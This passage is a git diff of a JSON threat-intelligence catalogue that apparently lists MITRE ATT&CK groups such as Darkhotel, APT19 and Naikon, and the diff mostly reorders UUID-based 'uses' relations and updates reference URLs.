"dest-uuid": "ae9d818d-95d0-41da-b045-9cabea1ca164", "tags": [ @@ -6191,20 +7259,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b136d088-a829-432c-ac26-5529c26d4c7e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", "tags": [ @@ -6213,7 +7267,7 @@ "type": "uses" }, { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6226,6 +7280,13 @@ ], "type": "uses" }, + { + "dest-uuid": "ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6ef745b-077f-42e1-a37d-29eecff9c754", "tags": [ @@ -6233,6 +7294,13 @@ ], "type": "uses" }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "cbf646f1-7db5-4dc6-808b-0094313949df", "tags": [ @@ -6240,6 +7308,13 @@ ], "type": "uses" }, + { + "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "00c3bfcb-99bd-4767-8c03-b08f585f5c8a", "tags": [ @@ -6248,42 +7323,7 @@ "type": "uses" }, { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e906ae4d-1d3a-4675-be23-22f7311c0da4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2daa14d6-cbf3-4308-bb8e-213c324a08e4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2eb9b131-d333-4a48-9eb4-d8dec46c19ee", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "67e6d66b-1b82-4699-b47a-e2efb6268d14", + "dest-uuid": "1ce03c65-5946-4ac9-9d4d-66db87e024bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6297,28 +7337,7 @@ "type": "uses" }, { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6331,12 +7350,117 @@ ], "type": "uses" }, + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2eb9b131-d333-4a48-9eb4-d8dec46c19ee", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2daa14d6-cbf3-4308-bb8e-213c324a08e4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "5e595477-2e78-4ce7-ae42-e0b059b17808", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b136d088-a829-432c-ac26-5529c26d4c7e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "67e6d66b-1b82-4699-b47a-e2efb6268d14", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "899ce53f-13a0-479b-a0e4-67d46e241542", @@ -6348,7 +7472,7 @@ "external_id": "G0012", "refs": [ "https://attack.mitre.org/groups/G0012", - "https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf" + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf" ], "synonyms": [ "Darkhotel" @@ -6369,13 +7493,6 @@ ], "type": "uses" }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", "tags": [ @@ -6389,6 +7506,90 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "9e729a7e-0dd6-4097-95bf-db8d64911383", @@ -6484,27 +7685,6 @@ ], "type": "uses" }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "123bd7b3-675c-4b1a-8482-c55782b20e2b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ @@ -6513,35 +7693,7 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2a6f4c7b-e690-4cc7-ab6b-1f821fb6b80b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6554,13 +7706,6 @@ ], "type": "uses" }, - { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", "tags": [ @@ -6576,7 +7721,14 @@ "type": "uses" }, { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "123bd7b3-675c-4b1a-8482-c55782b20e2b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6588,6 +7740,55 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2a6f4c7b-e690-4cc7-ab6b-1f821fb6b80b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "16ade1aa-0ea1-4bb7-88cc-9079df2ae756", @@ -6601,8 +7802,8 @@ "https://attack.mitre.org/groups/G0073", "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", "https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/", - "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", "https://www.fireeye.com/current-threats/apt-groups.html#apt19", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", "https://www.darkreading.com/attacks-breaches/chinese-hacking-group-codoso-team-uses-forbescom-as-watering-hole-/d/d-id/1319059" ], "synonyms": [ @@ -6614,20 +7815,6 @@ ] }, "related": [ - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ @@ -6635,20 +7822,6 @@ ], "type": "uses" }, - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ @@ -6656,13 +7829,6 @@ ], "type": "uses" }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", "tags": [ @@ -6670,13 +7836,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ @@ -6684,27 +7843,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ @@ -6712,13 +7850,6 @@ ], "type": "uses" }, - { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ @@ -6734,7 +7865,77 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6748,7 +7949,14 @@ "type": "uses" }, { - "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3433a9e8-1c47-4320-b9bf-ed449061d1c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6789,14 +7997,14 @@ "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6858,34 +8066,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ @@ -6894,49 +8074,14 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "5c6ed2dc-37f4-40ea-b2e1-4c76140a388c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6956,27 +8101,6 @@ ], "type": "uses" }, - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "38952eac-cb1b-4a71-bad2-ee8223a1c8fe", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -6985,14 +8109,35 @@ "type": "uses" }, { - "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7006,7 +8151,7 @@ "type": "uses" }, { - "dest-uuid": "c4de7d83-e875-4c88-8b5d-06c41e5b7e79", + "dest-uuid": "38952eac-cb1b-4a71-bad2-ee8223a1c8fe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7020,14 +8165,14 @@ "type": "uses" }, { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7040,6 +8185,48 @@ ], "type": "uses" }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c4de7d83-e875-4c88-8b5d-06c41e5b7e79", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ @@ -7047,6 +8234,27 @@ ], "type": "uses" }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "5c6ed2dc-37f4-40ea-b2e1-4c76140a388c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", "tags": [ @@ -7117,13 +8325,6 @@ ] }, "related": [ - { - "dest-uuid": "c2417bab-3189-4d4d-9d60-96de2cdaf0ab", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", "tags": [ @@ -7131,6 +8332,13 @@ ], "type": "uses" }, + { + "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", "tags": [ @@ -7138,6 +8346,13 @@ ], "type": "uses" }, + { + "dest-uuid": "c11ac61d-50f4-444f-85d8-6f006067f0de", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "bba595da-b73a-4354-aa6c-224d4de7cb4e", "tags": [ @@ -7152,6 +8367,13 @@ ], "type": "uses" }, + { + "dest-uuid": "c2417bab-3189-4d4d-9d60-96de2cdaf0ab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "30489451-5886-4c46-90c9-0dff9adc5252", "tags": [ @@ -7159,20 +8381,6 @@ ], "type": "uses" }, - { - "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ @@ -7181,7 +8389,7 @@ "type": "uses" }, { - "dest-uuid": "c11ac61d-50f4-444f-85d8-6f006067f0de", + "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7197,7 +8405,7 @@ "external_id": "G0019", "refs": [ "https://attack.mitre.org/groups/G0019", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf", "http://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf", "https://securelist.com/the-naikon-apt/69953/" ], @@ -7242,7 +8450,7 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7262,6 +8470,20 @@ ], "type": "uses" }, + { + "dest-uuid": "7f8730af-f683-423f-9ee1-5f6875a80481", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "22addc7b-b39f-483d-979a-1b35147da5de", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "8c553311-0baa-4146-997a-f79acef3d831", "tags": [ @@ -7269,20 +8491,6 @@ ], "type": "uses" }, - { - "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "2fb26586-2b53-4b9a-ad4f-2b3bcb9a2421", "tags": [ @@ -7297,13 +8505,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7f8730af-f683-423f-9ee1-5f6875a80481", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "007b44b6-e4c5-480b-b5b9-56f2081b1b7b", "tags": [ @@ -7311,43 +8512,50 @@ ], "type": 